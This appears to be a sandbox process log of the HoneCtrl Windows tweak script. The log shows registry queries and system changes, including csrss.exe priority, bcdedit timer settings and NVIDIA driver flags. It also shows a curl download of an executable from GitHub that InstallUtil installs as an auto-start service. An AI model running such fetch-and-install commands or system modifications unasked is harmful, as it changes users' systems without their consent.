C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GeForce"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "NVIDIA"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "RTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "AMD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Ryzen"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Intel"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "UHD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB" /t REG_DWORD /d 5217772 /f

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GeForce"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "NVIDIA"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "RTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "AMD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Ryzen"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Intel"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "UHD"

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass /t Reg_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority /t Reg_DWORD /d "3" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NoLazyMode" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "AlwaysOn" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NetworkThrottlingIndex" /t REG_DWORD /d "10" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "SystemResponsiveness" /t REG_DWORD /d "0" /f

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GeForce"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "NVIDIA"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "RTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "AMD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Ryzen"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Intel"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "UHD"

C:\Windows\system32\sc.exe

sc config "STR" start= auto

C:\Windows\system32\net.exe

net start STR

C:\Windows\system32\curl.exe

curl -g -L -# -o "C:\Hone\Resources\SetTimerResolutionService.exe" "https://github.com/auraside/HoneCtrl/raw/main/Files/SetTimerResolutionService.exe"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start STR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /i SetTimerResolutionService.exe

C:\Windows\system32\sc.exe

sc config "STR" start=auto

C:\Windows\system32\net.exe

net start STR

C:\Windows\system32\bcdedit.exe

bcdedit /set disabledynamictick yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start STR

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue useplatformclock

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic OS get buildnumber /value

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get buildnumber /value

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue useplatformtick

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GeForce"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "NVIDIA"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "RTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "AMD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Ryzen"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Intel"

C:\Windows\system32\cmd.exe

